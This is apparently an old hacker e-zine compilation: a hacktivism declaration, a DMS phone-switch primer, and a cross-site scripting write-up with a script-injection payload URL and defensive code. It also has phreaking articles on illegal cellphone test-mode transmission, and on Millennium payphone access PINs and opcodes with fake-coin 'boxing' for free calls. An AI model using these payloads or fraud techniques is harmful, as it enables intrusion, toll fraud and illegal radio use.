- information rights. People have a right to reasonable access of otherwise
- lawfully published information. If our leaders aren't prepared to defend the
- Internet, we are.
-
- ---------------------------------------------------------------------
-
- [1] some information cited in this press release was either paraphrased, or
- quoted directly, from the "Enemies of the Internet" report published by
- Reporters Without Frontiers, and may be found at http://www.rsf.fr
-
- THE HACKTIVISMO DECLARATION
- assertions of liberty in support of an uncensored internet
-
-
- DEEPLY ALARMED that state-sponsored censorship of the Internet is rapidly
- spreading with the assistance of transnational corporations,
-
- TAKING AS A BASIS the principles and purposes enshrined in Article 19 of the
- Universal Declaration of Human Rights (UDHR) that states, _Everyone has the
- right to freedom of opinion and expression; this right includes freedom to hold
- opinions without interference and to seek, receive and impart information and
- ideas through any media and regardless of frontiers_, and Article 19 of the
- International Covenant on Civil and Political Rights (ICCPR) that says,
-
- 1. Everyone shall have the right to hold opinions without interference.
-
- 2. Everyone shall have the right to freedom of expression; this right shall
- include freedom to seek, receive and impart information and ideas of all kinds,
- regardless of frontiers, either orally, in writing or in print, in the form of
- art, or through any other media of his choice.
-
- 3. The exercise of the rights provided for in paragraph 2 of this article
- carries with it special duties and responsibilities. It may therefore be subject
- to certain restrictions, but these shall only be such as are provided by law and
- are necessary:
-
- (a) For respect of the rights or reputations of others;
-
- (b) For the protection of national security or of public order, or of public
- health or morals.
-
- RECALLING that some member states of the United Nations have signed the ICCPR,
- or have ratified it in such a way as to prevent their citizens from using it in
- courts of law,
-
- CONSIDERING that, such member states continue to willfully suppress wide-ranging
- access to lawfully published information on the Internet, despite the clear
- language of the ICCPR that freedom of expression exists in all media,
-
- TAKING NOTE that transnational corporations continue to sell information
- technologies to the world's most repressive regimes knowing full well that they
- will be used to track and control an already harried citizenry,
-
- TAKING INTO ACCOUNT that the Internet is fast becoming a method of repression
- rather than an instrument of liberation,
-
- BEARING IN MIND that in some countries it is a crime to demand the right to
- access lawfully published information, and of other basic human rights,
-
- RECALLING that member states of the United Nations have failed to press the
- world's most egregious information rights violators to a higher standard,
-
- MINDFUL that denying access to information could lead to spiritual,
- intellectual, and economic decline, the promotion of xenophobia and
- destabilization of international order,
-
- CONCERNED that governments and transnationals are colluding to maintain the
- status quo,
-
- DEEPLY ALARMED that world leaders have failed to address information rights
- issues directly and without equivocation,
-
- RECOGNIZING the importance to fight against human rights abuses with respect to
- reasonable access to information on the Internet,
-
- THEREFORE WE ARE CONVINCED that the international hacking community has a moral
- imperative to act, and we
-
- DECLARE:
-
- * THAT FULL RESPECT FOR HUMAN RIGHTS AND FUNDAMENTAL FREEDOMS INCLUDES THE
- LIBERTY OF FAIR AND REASONABLE ACCESS TO INFORMATION, WHETHER BY SHORTWAVE
- RADIO, AIR MAIL, SIMPLE TELEPHONY, THE GLOBAL INTERNET, OR OTHER MEDIA.
-
- * THAT WE RECOGNIZE THE RIGHT OF GOVERNMENTS TO FORBID THE PUBLICATION OF
- PROPERLY CATEGORIZED STATE SECRETS, CHILD PORNOGRAPHY, AND MATTERS RELATED TO
- PERSONAL PRIVACY AND PRIVILEGE, AMONG OTHER ACCEPTED RESTRICTIONS. BUT WE
- OPPOSE THE USE OF STATE POWER TO CONTROL ACCESS TO THE WORKS OF CRITICS,
- INTELLECTUALS, ARTISTS, OR RELIGIOUS FIGURES.
-
- * THAT STATE SPONSORED CENSORSHIP OF THE INTERNET ERODES PEACEFUL AND CIVILIZED
- COEXISTENCE, AFFECTS THE EXERCISE OF DEMOCRACY, AND ENDANGERS THE SOCIOECONOMIC
- DEVELOPMENT OF NATIONS.
-
- * THAT STATE-SPONSORED CENSORSHIP OF THE INTERNET IS A SERIOUS FORM OF ORGANIZED
- AND SYSTEMATIC VIOLENCE AGAINST CITIZENS, IS INTENDED TO GENERATE CONFUSION AND
- XENOPHOBIA, AND IS A REPREHENSIBLE VIOLATION OF TRUST.
-
- * THAT WE WILL STUDY WAYS AND MEANS OF CIRCUMVENTING STATE SPONSORED CENSORSHIP
- OF THE INTERNET AND WILL IMPLEMENT TECHNOLOGIES TO CHALLENGE INFORMATION RIGHTS
- VIOLATIONS.
-
-
-
- =====================[ Digital Multiplexing System ]=====================
- =====================[ by Janus ]=====================
-
-
-
- This article will attempt to explain the DMS (Digital Multiplexing System).
- Think of this file as more of a compilation of the material I have read, rather
- than something I authored completely from scratch. Special thanks to Control-C
- for most of the information found here.
-
- -DMS
-
- DMS was/is made by Northern Telecom. It was first introduced in 1979. To date,
- DMS has been able to interface with such switches as ESS #1-4, Xbar, TSPS, and
- EAX. The DMS switch itself is physically smaller than a Xbar switch, and usually
- smaller than most AXE switches. This is because the DMS switch is more spread
- out, as opposed to other types of switches which are all located in one switch
- house. The use of remote modules give the CO more space to install a Line
- Concentrating Module (LCM) or Main Distribution Frame (MDF). Many versions of
- DMS exist. DMS versions and systems are as follows:
-
- 1) DMS-10 - a C5 switch which can be used with up to 10,800 lines. Designed for
- rural areas and large businesses. Almost always connected with a larger DMS-100
- or -100/200 switch.
-
- 2) DMS-100 - a C5 local office able to be used with 1,000 to 100,000 lines. Very
- widely used today to handle residential areas' phone lines. A DMS-100 local
- office can also be adapted to Equal Access End Office (EAEO)
-
- 3) DMS-200 - can be used with up to 60,000 trunks. Can also serve an AT (Access
- Tandem) function. The Auxiliary Operator Services System (AOSS) is a part of
- DMS-200 that controls operator-assisted calls, such as Directory Assistance.
- AOSS is made possible by Traffic Operator Position System (TOPS) and Operator
- Centralization (OC). These 2 functions allow transfer operator services from
- other DMS-200 toll centers.
-
- 4) DMS 100/200 - Uses functions such as the toll and local systems mentioned
- above, but also includes the EAEO/AT combination. Can handle either 100,000
- lines or 60,000 trunks. Used instead of using -100 and -200 separately.
-
- 5) DMS-250 - Not very widely used. Used in association with specialized common
- carriers that need tandem switching.
-
- 6) DMS-300 - Designed for international use. The number of DMS-300 switches that
- are used is in the single digits.
-
- 7) Remote Switching Center (RSC) - Used instead of DMS-100, it has the ability
- to switch up to 5,760 lines.
-
- 8) Remote Line Concentrating Module (RLCM) - Able to switch up to 640 lines. Can
- be used with RSC or DMS-100 with assistance from the Line Concentrator Module
- (LCM).
-
- 9) Outside Plant Module (OPM) - Able to switch up to 640 lines. Can also be used
- in association with RSC or DMS-100.
-
- 10) Subscriber Carrier Module (SCM or SCM-100) -
-
- -a) Subscriber Carrier Module (Rural (SCM-100R)) - Eliminates the CO Central
- Control Terminal (CCT) by being integrated with a DMS-100 switch.
-
- -b) Subscriber Carrier Module SLC-96 (SCM-100S) - gives a direct link between
- DMS-100 and SLC-96 loop carriers.
-
- -c) Subscriber Carrier Module Urban (SCM-100U) - Used to interact with DMS-1
- Urban (DMS version specialized for use in urban areas.)
-
- 11) DMS-Mobile Telephone Exchange (DMS-MTX) - A special type of DMS-100 that is
- used with Cellular switching. It can serve up to 50,000 people in up to 50
- cells.
-
- 12) Supernode
-
- -a) DMS-Supernode - Revision of the DMS-100 that supports faster processing.
-
- -b) DMS-Supernode SE - same as above, except in a reduced physical size, and
- uses the Link Peripheral Processor (LPP).
-
- Important Features of DMS-100:
-
- 1) Automatic Route Selection - automatically detects the best trunk for routing
- toll and LD calls.
-
- 2) Station Message Detail Recording - an enhanced call logging system, keeps
- track of times, dates, duration, etc.
-
- 3) Direct Inward System Access (DISA) - allows maintenance and administration
- from remote terminals.
-
- Operator Features included with DMS-200 and -100/200:
-
- 1) Traffic Operator Position System (TOPS) - gives certain functions to handle
- incoming and outgoing calls.
-
- 2) Operator Centralization (OC) - Lets an operator interface with the switch
- equipment itself. Allows calls to be routed from a remote DMS switch to a host.
-
- DMS is divided into 4 areas that each handle special operations:
-
- 1) Central Control Complex (CCC) - Controls the functions that are used in the
- other 3 areas. The CCC contains 4 units:
-
- -a) Central Processing Unit: Each DMS switch contains 2 CPUs. The CPUs have
- access to memory banks where stored programs and network data are located.
- Consider the CPUs the "engines" of the switch. They process all incoming data
- from outside lines.
-
- -b) Program Store Memory Module: Associated with one CPU to contain the program
- instructions needed to run programs on the switch. The second PS contains
- duplicate instructions.
-
- -c) Data Store Memory Module: Contains information such as customer information
- and office data. The second DS is a duplicate that is used with the second CPU.
-
- -d) Central Message Controller: Controls the messages between the other areas of
- the CCC and the Network Message Controller (NMC) in the various Network Modules
- or the I/O controller. Both CPUs have access to the CMC.
-
- 2) Network (NET) - Network Modules handle the vocal aspect between the
- Peripheral Modules and the Central Control Complex (CCC).
-
- 3) Peripheral Modules (PM) - Interface between analog trunks, subscriber lines,
- and digital carrier spans (DS-1). Responsible for creating dialtones,
- sending/receiving signalling, and checking the network.
-
- Before 1984, the following types of PMs existed:
-
- -a) Trunk Module - Changes speech into digital format to be sent through the
- line. The TM also handles MF tones, test circuit announcement trunks, etc.
-
- -b) Digital Carrier Module - gives a digital interface between the DMS switch
- and the DS-1 digital carrier. The DS-1 signal consists of 24 voice channels.
-
- -c) Line Module - gives an interface for a maximum of 640 analog lines and
- condenses the voice and signaling into two, three, or four DS-30, 32-channel
- speech links.
-
- -d) Remote Line Module - same as above, except it controls the DMS switch
- remotely. Can be used up to 150 miles away.
-
- Since 1984, 10 more types were added:
-
- -a) Digital Trunk Controller - Interfaces up to 20 DS-1 lines, then sends the
- DS-1 lines to the network.
-
- -b) Line Group Controller - Can interface up to 20 DS-30 lines, and can serve
- RSCs, RLCMs, or OPMs.
-
- -c) Line Trunk Controller - has the ability to give interfaces to a maximum of
- 20 outside ports from DS-30A speech links or DS-1 links to 16 network side DS-30
- speech links.
-
- -d) Line Concentrating Module - An expanded version of the LTC, it can serve up
- to 640 subscriber lines interfaced with 2-6 DS-30 speech links.
-
- -e) Remote Switching Center - interfaces subscriber lines at a remote location
- to a DMS-100 host. The RSC consists of the Line Concentrator Module, Remote
- Cluster Controller, Remote Trunking, Remote-off-Remote, and Emergency
- Stand-alone.
-
- -f) Remote Line Concentrating Module - an LCM used from a remote location from
- the DMS-100 host. Can handle up to 640 lines, sometimes used as replacement for
- PBXs.
-
- -g) Outside Plant Module - Outside plant remote unit. Handles 640 lines over 6
- DS-1 Links.
-
- -h) Subscriber Carrier Module - Remote interface for remote concentrators.
-
- -i) SCM-100R - Can interface up to five DMS-1R Terminals. Each terminal can
- handle up to 256 lines.
-
- -j) SCM-100U - Can interface up to three DMS-1 Urban RTs. Each RT can interface
- up to 576 POTS or special service lines.
-
- 4) Maintenance and Administration - DMS provides different ways to maintain and
- administrate the network. M&A is divided into 4 major groups:
-
- -a) Administrative: Provides for the interrogation, collection and modification
- of data.
-
- -b) Internal Maintenance: Includes all DMS hardware (to the MDF) and software.
-
- -c) External Maintenance: Includes circuits on the transmission facility.
-
- -d) Reporting: Include I/O facilities and the alarm system.
-
- Common Channel Interoffice Signalling (CCIS) uses a dedicated line to transmit
- data between offices, trunks, or trunk groups. CCIS-6 uses the International
- Consultative Committee on Telephone and Telegraph (CCITT) No. 6 international
- standard. CCIS-7 added the ability to use CCIS with almost all common DMS
- versions such as DMS-100, -200, -100/200, and -100/200 with TOPS. CCIS-6 uses 2
- types of Serving Offices (SO):
-
- 1) CCIS-BS: used for trunk signalling between COs. Transmits data such as
- numbers dialed, number dialed from, and other routing information. CCIS-BS put
- an end to Blue Boxing.
-
- 2) CCIS-DS: enables the use of touch-tone menu administration, such as voice
- mail, calling card input, and so forth.
-
- Access Tandems:
-
- 1) Equal Access (EA) gives a connection between Local Access and Transport Areas
- (LATA). It provides such services as ANI, Automatic Message Accounting (AMA)
- for both originating and terminating calls, and operator service signaling.
-
- 2) Equal Access End Office (EAEO) gives a connection between interLATA carriers
- and international carriers' POP.
-
- 3) Access Tandem with Equal Access End Office gives a connection from a trunk
- tandem to ICs/INCs POP inside a LATA. It uses a two-stage "overlap output
- pulsing" method which makes dialing quicker and easier. The first stage
- identifies the INC dialed and picks a reliable outgoing trunk. A connection is
- established from the INC to the EAEO through the access tandem. The second stage
- processes ANI and makes a connection to the called number through your specific
- DMS switch type.
-
- 4) Access Tandem with a Non-Equal End Office uses Feature Group A, B, or C to
- connect to an IC/INC. It uses standard Central Automatic Message Accounting
- (CAMA) to place a call through an AT.
-
- Other services provided with DMS switches used in urban areas:
-
- 1) Auxiliary Operator Services System (AOSS) - used primarily for directory
- assistance, and the intercept needs not included with TOPS.
-
- 2) Integrated Business Network (IBN) - commercial concept designed for business
- to have a small, private PBX. IBN can be installed into a business to a Centrex
- Control Office or a Centrex Customer Unit with minor hardware adjustments.
- Features of IBN include the ability to handle 30,000 lines, customer call
- records, centralized attendant maintenance, administration functions, and direct
- inward dialing.
-
- 3) Electronic Switched Network (ESN) - designed to meet needs of multi-location
- complexes. Used with SL-1 or -100 Digital Business Communications Systems with
- networking features or a DMS-100 IBN host.
-
- 4) Specialized Common Carrier Service (SCCS) - provides conversion of analog and
- digital signals. Must be used with older analog lines, sometimes also used with
- newer digital lines.
-
- DMS-MTX is a DMS switch used for switching radio and cellular signals. DMS
- switches provide 3 basic types of cell switching:
-
- 1) Stand-alone switching is used by a MTX which is interfaced with one or more
- C5 EOs with DID trunks. MTX is used with urban areas, MTXC for suburban areas,
- and MTXM for rural areas.
-
- 2) Combined switching is the most cost-effective type of MTX and is easy to
- install. It can be incorporated into a DMS-100 switch and used with cellular
- software.
-
- 3) Remote switching is accomplished by the Remote Switching Center (RSC)
- alongside a Cell Site Controller (CSC). A Remote or Stand-alone switch hosts the
- remote switch. Remote switching is not used in urban areas.
-
- ___________
-
- Suggested Reading:
-
- Understanding DMS; Control-C; 1987 (Most of my information came from here!)
- DMS Family of Digital Switching Systems; Erudite; ????
- DMS-100; Jester Sluggo; ????
- DMS-100 Family System; Northern Telecom; 1978
-
- --Janus hijanus@tupac.com
-
-
-
- =================[Cross Site Scripting the Security Gap]=================
- =================[ by Tamer Sahin ]=================
-
-
-
- I wonder whether Microsoft applies the patches for its products to its own
- systems. This question is always on my mind. I personally think that not enough
- effort is made on this point, and with a little investigation I found that a
- very simple security flaw was still standing on the microsoft.com web site. This
- problem, of course, does no direct harm to the server, but it may turn out to be
- annoying if used indirectly. Yes, the name of this security gap is "Cross Site
- Scripting". This security gap, which was discovered by Georgi Guninski, looks
- like it might cause some problems for banks and for sites where online shopping
- is done.
-
- What Can Be Done About It?
-
- I want to talk a little bit about "Cross Site Scripting". This security gap was
- announced in the preceding months. By means of it, many commands can be run in
- users' browsers via the targeted sites; with the help of some scripts, processes
- such as reading files from their disks, or even diverting them to other sites,
- can be carried out. These kinds of security threats are a big deal for financial
- institutions or for businesses that sell over the net. (In one of the
- commercials of a bank in Turkey, people sit in a car, lock the doors and, in a
- spontaneous fantasy, show their ID cards to the ones who have come out to do
- their banking, to verify the reliability of the site.) This problem exists in a
- large number of sites, but what surprised me was finding this security gap at
- Microsoft too, which has itself delivered a patch for this problem.
-
- Practice
-
- Any ASP running on the site (it could be a search engine, or just as well a
- script like null.htw) can be made to run code by appending a <script> block to
- its input. I am going to show how it is done with a minimal piece of code. It
- is not difficult at all to write more specific scripts; with a little
- imagination this security gap could be much more annoying than one would think.
- Yes, as I have mentioned before, it is no big deal to alter the properties of
- this script; this is only a minimal instance. Now for the theory...
-
- Theory
-
- The problem that arose at Microsoft is the null.htw file that remains on the
- server. The majority of us (?) delete scripts with .htw, .idq and similar
- extensions, or set their permissions so that only the intended use is permitted.
- It looks like Microsoft did not feel such a necessity. By requesting a URL like
- the one below, we can trigger the "Cross Site Scripting" security gap with the
- help of null.htw:
-
- http://www.microsoft.com/null.htw?CiWebHitsFile=/default.asp&CiRestriction=
- "<SCRIPT>alert('Helloo!!');</SCRIPT>"
-
-
-
- The Solution
-
- Below you can find code that can be used against "Cross Site Scripting" attacks
- on forms and the like. With this code, the submission of large script blocks
- through the form's "onsubmit" handler is prevented, and characters such as
- % < > [ ] { } ; & + - " ' ( ) are caught and removed rather than executed.
-
- function checkForm() {
-     // Strip the blacklisted characters from the field before the form is submitted
-     document.forms[0].userName.value =
-         RemoveBad(document.forms[0].userName.value);
-     return true;
- }
-
- // Bad Characters
- function RemoveBad(strTemp) {
-     strTemp = strTemp.replace(/\<|\>|\"|\'|\%|\;|\(|\)|\&|\+|\-/g, "");
-     return strTemp;
- }
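- As an added example that is not the article's code (nor Microsoft's), the
- blacklist from the snippet above placed beside HTML output encoding, both run
- over the CiRestriction value from the URL quoted earlier; reflectedValue and
- isInertWhenEmbedded are hypothetical helpers, and the legitimate search term is
- constructed.

```javascript
"use strict";
// Added example (not from the article or from Microsoft): the article's
// RemoveBad() blacklist beside HTML output encoding, both applied to the
// reflected CiRestriction value from the URL quoted in the article.

// The article's approach, with the same character set as its RemoveBad():
// delete the characters outright. It runs in the browser, so a request that
// never passes through the form is not filtered at all.
function removeBad(strTemp) {
  return strTemp.replace(/[<>"'%;()&+-]/g, "");
}

// Output encoding for an HTML text context: escape the five characters that
// have meaning to the HTML parser. The data itself is preserved.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Inverse of escapeHtml, used to show that encoding loses nothing.
const HTML_UNESCAPES = { "&amp;": "&", "&lt;": "<", "&gt;": ">", "&quot;": '"', "&#39;": "'" };
function unescapeHtml(value) {
  return String(value).replace(/&(?:amp|lt|gt|quot|#39);/g, (ent) => HTML_UNESCAPES[ent]);
}

// Hypothetical server-side helper: extract the parameter the page will echo.
function reflectedValue(requestUrl, paramName) {
  const value = new URL(requestUrl).searchParams.get(paramName);
  return value === null ? "" : value;
}

// Hypothetical check: after sanitising, does the value still contain anything
// the HTML parser would read as the start of a tag?
function isInertWhenEmbedded(value, sanitise) {
  return !/<\s*\/?\s*[A-Za-z]/.test(sanitise(value));
}

// Constructed sample input: the request URL quoted in the article.
const ARTICLE_URL =
  "http://www.microsoft.com/null.htw?CiWebHitsFile=/default.asp&CiRestriction=" +
  "\"<SCRIPT>alert('Helloo!!');</SCRIPT>\"";

// Constructed legitimate search term containing blacklisted characters.
const LEGIT_QUERY = "O'Brien & Sons (UK)";

function demo() {
  const payload = reflectedValue(ARTICLE_URL, "CiRestriction");
  return {
    payload,
    stripped: removeBad(payload),            // tag gone, but so is any quote in real data
    encoded: escapeHtml(payload),            // rendered as literal text by the browser
    legitStripped: removeBad(LEGIT_QUERY),   // blacklist mangles honest input
    legitEncoded: escapeHtml(LEGIT_QUERY),   // encoding keeps it intact...
    roundTrip: unescapeHtml(escapeHtml(LEGIT_QUERY)) === LEGIT_QUERY, // ...and reversible
  };
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(demo());
}
```

- Encoding is context-specific: the entity set here is for HTML text and
- attribute values, and a value written into a script block or a URL needs that
- context's encoding instead.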
-
-
-
- Official Patch: http://www.microsoft.com/technet/security/bulletin/MS00-060.asp
-
- Tamer Sahin Hacking Officer http://www.tamersahin.net feedback@tamersahin.net
-
-
-
- =============[Shell/PPP Connectivity over Cellular Networks]=============
- =============[ by engel ]=============
-
-
-
-
- This hasn't been fully tested (I've only tested the shell portion). It's up to
- you to try out the PPP connection. In theory, it should work, but it's going to
- be really slow. And be forewarned, this is illegal. Everything you do based on
- this is your choice, not mine. I am only supplying information, and I am not
- responsible for your actions. If the FCC comes a knocking, don't be bitching to
- me or LoU about your legal engagements. It is your fault if you get caught doing
- any of the below in practice. Not mine.
-
- The idea came to me a few months ago when I was in my friend's car, wishing that
- I could nab a few files off my system when we were on the road. It completely
- dawned on me a few minutes later when I was playing with my Motorola 2800
- bagphone. I had to find a way to make a network connection to my main server
- back at my (old) house. And I figured cellular communication was the way to go.
-
- I went home later that day, and dug around my box full of (mostly) various
- electronics and phone equipment. I found an old US Robotics 28.8 ext. modem,
- RJ-11 -> Motorola TeleTAC adapter (For modems, duh.) and my old acoustic
- coupler. I threw the external modem on my server, then ran some RJ11 to the
- adapter, and connected the adapter to the TeleTAC. Whee.
-
- Now, client side, I popped the coupler onto the 2800, then connected it to my
- amazing 14.4 on the lappy. Now how the fuck did I establish the god damn
- connection? This is going to be a bit lengthy, so let's list it out.
-
- 1) I edited my inittab (/etc/inittab) and added a dialup term. (You can find
- it.)
-
- 2) Popped both cellphones into testmode. Nothing like FCN-00-**-83786633-STO.
- Then I popped them onto an unused channel. And then (gasp) put them into Rx/Tx
- mode by doing the following. a) 08# b) 10# c) 05# d) 353#
-
- Oh my. I think we can hear ourselves talk over the channel. Isn't that special?
-
- 3) On the external modem, I threw a switch on it that said 'Auto Answer'. Now, I
- realize this isn't on all Externals, and I should recommend that you find one,
- whether it's at a Goodwill, or a vintage computer store.
-
- 4) Started minicom on the laptop. And typed in the magical string, ATD.
-
- Boom. That's all it took. I got an amazing 19.2 connection over the cellular
- link. Now, could you get a higher connection with faster modems? No, dumb ass.
- You can probably get a 28.8 connection, but it will most likely time out.
-
- Now, unless you have some really old towers around your area that actually
- forward channels through different towers (i.e. You're driving down the road,
- and you're out of the original tower's range, then you switch over.) you're
- going to get disconnected if you pass the limited range of your tower, which is
- anywhere between 6 to 10 miles. There are only a couple of ways around that, but I'm
- sure you can figure them out within a few hours, minutes, or seconds from now.
-
- Okay, so you have yourself a cellular shell. Whoop dee doo. Now if you can
- actually make a networked connection over the link, that would be nice, eh?
- Well, using the wonderful PPP protocol, we can!
-
- Add a new user on your host, name it whatever the fuck you want. Now, for the
- shell, make sure it's /usr/sbin/pppd. Make a new file in your favorite editor
- called .ppprc and put it in the user's $home. Put the following in it.
-
-
- # ~/.ppprc for that user: pppd reads these options when it starts as the login shell
- -detach modem crtscts lock :192.168.100.4
-
- Whoop, there it is. Now on the client side, make a ppp script that logs in as
- that user. And that's all she wrote. It should work, but I make no guarantees
- whatsoever, since I never tested it.
-
- So play around with it, if you dare. Mail me some followups, additions, and so
- on also, I'd like to hear some new ideas to add to this simple project. Next
- time, I'll get in depth with more wireless networking projects for your geeky
- enjoyment.
-
- http://www.phonegeek.org
-
-
-
- =====================[ Nortel Millennium Payphones ]=====================
- =====================[ by ^CircuiT^ ]=====================
-
-
-
-
- Well, for you people out there who don't know what a Millennium payphone looks
- like, I'll start out by telling you. There are many different types of
- Millennium payphones and none of them look the same, so instead of sitting here
- and trying to describe them all, I have a few pictures with this file. The most
- common Millennium payphone is the M1231, and since it is the most common, that is
- the one I will talk about most in this file. For the rest of them look at the
- end of this file. The M1231 is black with a silver front and a two-line LED
- screen that can be reprogrammed to say other things, such as "Mr. T was here",
- but I'll be getting into the reprogramming of that a bit later. Under the LED
- screen there are four buttons: the first two control the volume, the next one
- controls the language (for example English to Spanish, or English to French for
- you people in Canada), and the last button hangs up your call so you can make
- another one. The top of the phone is blue, and at the bottom there is a yellow
- card reader for smart cards, credit cards, and other calling cards such as MCI
- calling cards. Just above the yellow card reader there are five more buttons
- that the owner/local phone company can program to do whatever they want. There
- are two different versions of the M1231: ver1.0 does not have an RJ-11 jack, but
- ver2.0 does. The RJ-11 jack is there so you can plug your laptop into the
- phone and connect to the Internet. (The M1231 ver2.0 is mostly in airports.)
-
- Well, now that you know what they look like, let's get into the security of the
- payphone. It has four keyholes, as you might have seen by just looking at it.
- The two keyholes on the top and left-hand side of the phone are for changing the
- LED screen. There is another keyhole underneath the yellow card reader that
- is for changing the coin box, and on the side of the coin box there is yet
- another keyhole; you need both keys to open the coin box. You will also need an
- access code (or PIN) to get to the coin box (this is not yet confirmed). Another
- little bit of security the phone has is an alarm; some are silent and some are a
- loud beep. When the alarm is set off the phone calls a set number and notifies
- them that there is a problem. There are some security rumors flying around, such
- as that there is a tracking device in the phone, and that if a phone is stolen
- and then hooked up to a new phone line it will automatically call a set number.
-
- OK, now that you know about the phone's security and how to open it, let's get
- into the internal hardware workings of the phone. Unlike other payphones, the
- Nortel Millennium payphone has a built-in computer and modem. The computer is
- called the "Millennium Manager" and it keeps a log of every call made from the
- phone, including 800, 888, 877, 911, 611, 411, 311, and 0. It also keeps track
- of how the person paid for the call (collect, card, cash), keeps tabs on how
- many coins are in the coin box, and if anything else goes wrong in the phone,
- such as the card reader or LED screen, it calls a set number and tells them. It
- also keeps a log of every time the phone is opened, the coin box is opened, or
- someone changes the display screen. A tool called the "Millennium Maximizer"
- accesses all this, but not much is yet known about it. As I get that
- information I will release it. On to the yellow card reader. Once you have
- opened the phone you should be able to remove the yellow card reader with
- standard tools such as a screwdriver, etc. Once you have the yellow card reader
- you should be able to hook it up to your home computer and read cards with it,
- but with what software I don't know. Some people say that you can modify cards
- with it as well, but I have seen nothing that would indicate that. OK, now that
- all that stuff is out of the way, let's talk about that little two-line LED sign.
- To change the display, this is what you must do first: you will need two keys,
- one for the top and one for the left-hand side. After unlocking them you will
- have to enter an access code (or PIN) from the keypad. (If you don't enter the
- PIN an alarm will sound.) Then you can remove the top part of the phone; inside
- you will find a port that you can plug a Millennium Maximizer into.
-
- OK people, we've made it this far, so let's get straight into the software
- aspect of the phone, starting off with the Millennium Manager. The Millennium
- Manager is the program the phone's computer runs; it keeps track of everything
- as I said above, and that's all I know at this point about the manager. Now
- onto the Opcodes. Opcodes are short strings of numbers that are pre-set
- functions on Millennium payphones, but you must correctly enter a PIN before
- you have the chance to input an Opcode. I have heard from other people that
- you can dial 2541965, or yet another code that is CRASERV, or in numbers
- 2727378, with the hook down. After you dial it you should be asked for an
- access code (or PIN). One known PIN is 25563. After you enter the PIN you can
- enter any Opcode. Here is a list of opcodes:
-
-     267#     Answer detect
-     274#     Display brightness control (down?)
-     277#     Display brightness control (up?)
-     349#     Unknown
-     636#     memory access
-     688#     Unknown
-     66666#   motor sound, prompts to open phone - probably coin removal
-     996#     error has occurred
-
- (Please note these codes are what people have told me; I have not gotten them
- to work.) Another software aspect of the phone is the fake dial tone; it's only
- a recording. You would know this if you ever picked one up, because you hear
- the fake dial tone and some op telling you to "insert your card". So what
- happens is you dial the number you're calling, put your money in, and the
- computer dials it, so you never get the chance to hear a real dial tone. You
- might be asking yourself, if I don't ever hear a real dial tone, can I box a
- call off a Millennium phone? The answer is yes and no. Yes, you can box local
- calls; I do it all the time: just hit 0 for the op and tell her the phone's
- keypad is messed up and ask her to dial for you, then drop in your tones. The
- no is for boxing long distance calls; the ops don't really like it when you put
- in $3.50 in fake coins.
-
- One of the most fun things I have found about the Millennium phone is that you
- can use it as a DTMF decoder. It's really simple: all you do is take your
- recorded DTMF tones to the phone and play them really loud into the mouthpiece
- of the phone; the numbers will show up on the LCD screen and there you go, you've
- got a DTMF decoder.
-
- Well, we have covered a whole lot about the Millennium payphone, but there's
- still a little bit to cover, like the fact that Millennium phones have a ringer
- but never ring. The reason for this is that if you call a Millennium phone you
- will get one of about four different messages saying things like "this line is
- for outgoing calls only" or "the number ***-**** is out of service". The reason
- Nortel did this was because they didn't want drug dealers hanging out by the
- phone waiting for a call. If you act like a really nice person you can call the
- op and ask her to call you back on it. "But wait a minute, you said they can't
- get incoming calls." Well, they can, but only from an op. See, when you call her
- this pops up on her screen: 0 (+) MIL_UNIV or 0 (+) MIL_CARD plus your location,
- so she thinks, why call them back? But if you convince her, who knows, you might
- have made that phone ring for the first time ever.
-
- OK, now that we are done with everything, let's talk about all the other
- Millennium phones. Since I haven't used any of these phones yet, I don't have
- much to talk about, so I have put in here what Nortel has to say about their
- phones on their web page, and if you're reading this out of the zip you've got
- pictures with this file. Enjoy.
-
- The M1000
-
- Public communications access terminals need to be ready for the future
- -- even if they accept only coins today. The Millennium M1000 Coin Basic
- Terminal is an ideal solution for low-revenue sites because it keeps the door
- open to future expansion by allowing you to add options quickly and easily in
- the field. For example, you can install a 2-line x 20-character illuminated
- display that can help you generate new sources of revenue. And to further
- increase payphone usage, you can add the optional card reader. Driven by
- Millennium Manager, this payphone workhorse protects your investment and revenue
- stream with electronic coin validation, anti-fraud capabilities and
- anti-vandalism features.
-
- The M1131
-
- This terminal is the perfect solution for service providers who want
- to offer advanced public communications access while eliminating the cost of
- handling coins. The Millennium M1131 Card Only Terminal handles card
- transactions with ease allowing customers to use a variety of cards, including
- calling cards, credit cards, cash cards and smart cards. Card customization
- programs provide another opportunity to further differentiate yourself from the
- competition by making branding and image advertising possible. And like all
- Millennium terminals, the Card-Only Terminal offers intelligent features such as
- call statistics, self-diagnostics and alarms, store-and-forward routing, voice
- prompts and call rating. Simple to install and maintain, these terminals are
- backed by the powerful, fault-tolerant Millennium Manager.
-
- The M1231
-
- More payment options mean more customers. From coins to calling
- cards, credit cards, cash cards and smart cards -- the Millennium M1231 MultiPay
- Terminal accepts them all. And with so many options, gaining and retaining
- customer loyalty is as simple as picking up the phone. Millennium MultiPay
- Terminals are changing the scope of customer expectations and the future of
- public payphones. The RJ-11 data jack provides Internet access and enables data
- calls. A scrolling display can double as a billboard for advertising and
- cross-selling promotions. Quick Access Keys speed revenue generation and allow
- customers to access their choices quickly. Busy lobbies, cafeterias, convenience
- stores and parking lots are just a few of the many sites where MultiPay
- Terminals easily reach their earning potential.
-
- The M1241
-
- This advanced terminal can offer consumers more choices, added
- convenience and access to the power of the network. It's the ideal platform,
- allowing smart cards, credit cards and calling cards to drive increased usage
- and revenue. Configured with the RJ-11 integrated data jack, the Millennium
- M1241 MultiPay/MultiApplication Terminal lets you offer easy access to network
- services, e-mail and the Internet to attract callers with laptop computers. Not
- only can you reap additional revenues from the computer calls themselves, the
- terminal's flashing display and Quick Access Keys let you cross-sell your
- products and services to callers during data transactions. Or you can lease
- displays and Quick Access Keys to third-party advertisers for additional
- revenue. The M1241 Terminal also features downloadable code, which allows you to
- make changes and upgrade services without a site visit.
-
- The M1245
-
- This consumer-friendly terminal can provide information to your
- customers with a touch of a button -- while increasing your revenue. With its
- large graphical display, this terminal becomes much more than a payphone to
- attract people on the move. It's an electronic billboard. Ideal for any
- high-traffic site or any retail delivery location, the M1245 MultiApplication
- Terminal is loaded with features -- but uncluttered and easy to use. And it
- accepts coins as well as cards for added convenience and customer appeal. An
